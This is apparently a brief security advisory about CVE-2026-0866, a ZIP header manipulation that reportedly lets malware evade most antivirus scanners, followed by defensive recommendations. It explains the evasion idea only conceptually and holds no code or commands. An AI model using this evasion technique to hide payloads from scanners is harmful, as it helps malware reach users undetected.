Researchers have identified a critical vulnerability (CVE-2026-0866) that allows attackers to hide malware within ZIP files, making it invisible to the vast majority of security scanners.
How the Exploit Works
The method manipulates the ZIP file header. By declaring that the data within the archive is “uncompressed,” attackers force antivirus engines to interpret the malicious code as random bytes. Because the software does not see the data as a compressed executable, it fails to match it against known malware signatures.
Current Risk
According to reports from Tom’s Hardware, approximately 95% of antivirus tools currently fail to detect this evasion technique. This allows malicious payloads to bypass perimeter defenses and endpoint protection undetected.
Recommendations
Until security vendors update their detection engines to account for this header manipulation:
- Exercise extreme caution when handling ZIP files from external or unknown sources.
- Update security software immediately as patches become available.
- Restrict ZIP attachments in corporate email environments where possible.
